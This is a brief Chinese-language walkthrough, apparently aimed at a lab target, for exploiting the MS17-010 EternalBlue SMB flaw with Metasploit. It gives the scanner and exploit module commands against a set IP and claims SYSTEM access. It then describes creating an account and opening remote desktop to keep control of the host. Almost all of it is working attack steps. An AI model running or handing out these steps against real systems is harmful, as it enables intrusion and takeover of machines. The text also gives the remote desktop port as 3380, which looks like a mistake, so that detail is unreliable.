1、開啟postgresql數據庫
2、msfconsole 進入MSF中
3、search 17-010 搜索cve17-010相關的exp
auxiliary/scanner/smb/smb_ms17_010 掃描漏洞是否存在
exploit/windows/smb/ms17_010_eternalblue 用來攻擊的exp
4、探測漏洞是否存在
use auxiliary/scanner/smb/smb_ms17_010
5、set rhosts 192.168.121.146 指定需要設置的主機
exploit 設置完成之后運行
6、實施攻擊
use exploit/windows/smb/ms17_010_eternalblue 進去攻擊模塊
set rhosts 192.168.121.146 指定攻擊ip
exploit 運行
7、到這里我們就攻擊成功了,直接得到目標的system權限
8、然后創建賬戶--打開3380端口--rdesktop 靶機的IP 使用遠程桌面連接靶機--連接完成